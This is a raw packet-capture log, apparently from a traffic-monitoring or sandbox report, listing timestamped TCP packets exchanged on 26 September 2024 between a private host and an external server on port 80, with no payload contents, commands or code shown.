Sep 26, 2024 02:40:21.537722111 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538369894 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538389921 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538400888 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538413048 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538414955 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538425922 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538431883 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538440943 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538453102 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538455963 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538465977 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538470984 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538480043 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538495064 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538506031 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538512945 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538520098 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538532019 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538535118 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538546085 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538558960 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538558960 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538573980 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538578987 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538589001 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538599968 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538603067 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538614035 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538625002 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538631916 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538645029 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538650990 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538659096 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538675070 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538690090 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538734913 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538747072 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538758039 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538769007 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538769960 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538784027 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.538793087 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.538819075 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.539941072 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.539959908 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.539969921 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.539983034 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.539987087 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.539995909 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540008068 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540009975 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540021896 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540026903 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540035963 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540049076 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540056944 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540060997 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540071011 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540076017 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540087938 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540096998 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540112972 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540124893 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540126085 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540137053 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540144920 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540149927 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540160894 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540169954 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540174007 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540184975 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540195942 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540196896 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540210962 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540215015 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540226936 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540229082 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540241003 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540251017 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540252924 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540266991 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540270090 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540282011 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540292978 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540293932 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540307999 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540318966 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540319920 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540332079 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540340900 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540344954 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540357113 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540360928 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540375948 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540383101 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540391922 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540400028 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540405035 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540411949 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540421009 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540429115 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540431023 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540445089 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540446043 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540457964 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540465117 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540472984 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540484905 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.540493011 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540504932 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.540555954 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.541804075 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.541830063 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.541842937 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.541848898 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.541855097 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.541865110 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.541868925 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.541881084 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.541882038 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.541893959 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.541899920 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.541907072 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.541919947 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.541933060 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.541938066 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.541948080 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.541950941 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.541963100 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.541976929 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.541976929 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.541987896 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.541999102 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542001009 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542011976 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542021036 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542027950 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542037010 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542041063 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542053938 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542062998 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542067051 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542079926 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542083025 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542092085 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542104959 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542107105 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542118073 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542130947 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542130947 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542155981 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542171001 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542411089 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542426109 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542438030 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542449951 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542450905 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542463064 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542470932 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542478085 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542490959 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542500973 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542520046 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542587042 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542599916 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542608976 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542622089 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542623997 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542638063 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542648077 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542650938 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542664051 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542674065 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542675972 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542700052 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542715073 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542716026 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542737961 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542748928 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542757034 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542769909 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542772055 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542783976 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542784929 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542799950 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542804003 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542814970 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542821884 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542829037 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542838097 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542841911 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542853117 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542856932 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542871952 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542872906 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542887926 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542896032 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542901993 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542915106 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542926073 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542927980 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542942047 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542951107 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542953968 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542964935 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542970896 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542983055 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.542994976 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.542995930 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.543010950 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.543021917 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.543025970 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.543035984 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.543040037 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.543051958 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.543062925 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.543067932 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.543081999 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.543090105 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.543093920 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.543103933 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.543108940 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.543129921 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.543154001 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.544513941 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544526100 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544536114 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544548035 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544557095 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.544559002 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544572115 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.544572115 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544584990 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544595957 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.544600964 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544610977 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.544615030 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544627905 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544636965 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.544640064 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544660091 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544663906 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.544672966 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544681072 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.544686079 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544698000 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544703007 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.544713020 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544724941 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544725895 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.544737101 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544753075 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.544779062 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.544914961 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.544949055 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.544991016 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545003891 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545016050 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545027018 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545030117 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545041084 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545043945 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545056105 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545057058 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545070887 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545072079 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545085907 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545095921 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545099020 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545113087 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545120001 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545130968 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545144081 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545144081 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545157909 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545161009 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545172930 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545186043 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545186996 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545201063 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545207977 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545216084 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545229912 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545234919 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545243979 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545257092 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545262098 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545277119 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545294046 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545598984 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545613050 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545624018 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545634031 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545636892 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545648098 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545650005 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545663118 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545666933 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545680046 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545687914 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545691967 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545706034 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545713902 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545717955 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545731068 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545743942 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545751095 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545761108 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545763969 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545778036 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545782089 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545792103 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545804024 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545824051 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545926094 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545942068 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545958996 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545962095 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545973063 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545984030 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.545984983 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.545999050 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.546000004 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.546010971 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.546022892 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.546022892 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.546036959 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.546046972 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.546047926 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.546071053 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.546073914 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.546083927 CEST	80	49705	185.215.113.37	192.168.2.8
